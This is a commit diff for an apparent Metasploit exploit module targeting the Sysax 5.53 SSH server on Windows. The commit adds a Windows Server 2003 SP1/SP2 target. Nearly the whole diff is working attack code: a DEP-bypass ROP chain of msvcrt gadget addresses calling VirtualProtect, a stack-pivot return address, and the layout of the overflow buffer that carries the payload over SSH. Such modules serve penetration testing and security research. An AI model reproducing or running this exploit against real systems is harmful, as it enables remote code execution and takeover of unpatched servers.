Add ROP target for Win2k3 SP1 and SP2
This commit is contained in:
parent
29cf8683ee
commit
4b1e67f94f
|
@ -47,9 +47,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# Win XP SP3 and Win2k3 SP0
|
||||
# POP/POP/RET - sysaxservd.exe
|
||||
['Sysax 5.53 on Win XP SP3 / Win2k3 SP0', {'Ret'=>0x00402669}]
|
||||
[
|
||||
'Sysax 5.53 on Win XP SP3 / Win2k3 SP0',
|
||||
{
|
||||
'Rop' => false,
|
||||
'Ret' => 0x00402669 # POP/POP/RET - sysaxservd.exe
|
||||
}
|
||||
],
|
||||
[
|
||||
'Sysax 5.53 on Win2K3 SP1/SP2',
|
||||
{
|
||||
'Rop' => true,
|
||||
'Ret' => 0x0046d23c # ADD ESP, 0F8C # RETN
|
||||
}
|
||||
]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Feb 27 2012",
|
||||
|
@ -70,16 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
#
|
||||
# Load net/ssh so we can talk the SSH protocol
|
||||
#
|
||||
has_netssh = load_netssh
|
||||
if not has_netssh
|
||||
print_error("You don't have net/ssh installed. Please run gem install net-ssh")
|
||||
return
|
||||
end
|
||||
|
||||
def get_regular_exploit
|
||||
#
|
||||
# Align the stack to the beginning of the fixed size payload
|
||||
#
|
||||
|
@ -115,6 +117,80 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
buf << "\xeb" + [0-align.length-2].pack('c') + make_nops(2) #Short jmp back
|
||||
buf << [target.ret].pack('V*')
|
||||
|
||||
return buf
|
||||
end
|
||||
|
||||
def get_rop_exploit
|
||||
|
||||
junk = rand_text(4).unpack("L")[0].to_i
|
||||
nop = make_nops(4).unpack("L")[0].to_i
|
||||
|
||||
# !mona rop -m msvcrt
|
||||
p =
|
||||
[
|
||||
0x77bb2563, # POP EAX # RETN
|
||||
0x77ba1114, # <- *&VirtualProtect()
|
||||
0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
|
||||
junk,
|
||||
0x77bb0c86, # XCHG EAX,ESI # RETN
|
||||
0x77bc9801, # POP EBP # RETN
|
||||
0x77be2265, # ptr to 'push esp # ret'
|
||||
0x77bb2563, # POP EAX # RETN
|
||||
0x03C0990F,
|
||||
0x77bdd441, # SUB EAX, 03c0940f
|
||||
0x77bb48d3, # POP EBX, RET
|
||||
0x77bf21e0, # .data
|
||||
0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
|
||||
0x77bbfc02, # POP ECX # RETN
|
||||
0x77bef001, # W pointer (lpOldProtect) (-> ecx)
|
||||
0x77bd8c04, # POP EDI # RETN
|
||||
0x77bd8c05, # ROP NOP (-> edi)
|
||||
0x77bb2563, # POP EAX # RETN
|
||||
0x03c0984f,
|
||||
0x77bdd441, # SUB EAX, 03c0940f
|
||||
0x77bb8285, # XCHG EAX,EDX # RETN
|
||||
0x77bb2563, # POP EAX # RETN
|
||||
nop,
|
||||
0x77be6591, # PUSHAD # ADD AL,0EF # RETN
|
||||
].pack("V*")
|
||||
|
||||
p << payload.encoded
|
||||
|
||||
#
|
||||
# Similar buffer structure to get_regular_exploit
|
||||
#
|
||||
buf = ''
|
||||
buf << rand_text(392, payload_badchars)
|
||||
buf << rand_text(20, payload_badchars)
|
||||
buf << rand_text(1012, payload_badchars)
|
||||
buf << p
|
||||
buf << rand_text(9204-buf.length)
|
||||
buf << rand_text(4, payload_badchars)
|
||||
buf << [target.ret].pack('V*')
|
||||
|
||||
return buf
|
||||
end
|
||||
|
||||
def exploit
|
||||
#
|
||||
# Load net/ssh so we can talk the SSH protocol
|
||||
#
|
||||
has_netssh = load_netssh
|
||||
if not has_netssh
|
||||
print_error("You don't have net/ssh installed. Please run gem install net-ssh")
|
||||
return
|
||||
end
|
||||
|
||||
#
|
||||
# Create buffer based on target (DEP or no DEP)
|
||||
# If possible, we still prefer to use the regular version because it's more stable
|
||||
#
|
||||
if target['Rop']
|
||||
buf = get_rop_exploit
|
||||
else
|
||||
buf = get_regular_exploit
|
||||
end
|
||||
|
||||
#
|
||||
# Send the malicious buffer
|
||||
#
|
||||
|
@ -149,6 +225,4 @@ end
|
|||
=begin
|
||||
Todo: We seriously need a MSF SSH mixin to handle the SSH protocol ourselves, not
|
||||
relying on net/ssh.
|
||||
|
||||
* Need a reliable stack pivot to rop out, haven't found one
|
||||
=end
|
||||
|
|
Loading…
Reference in New Issue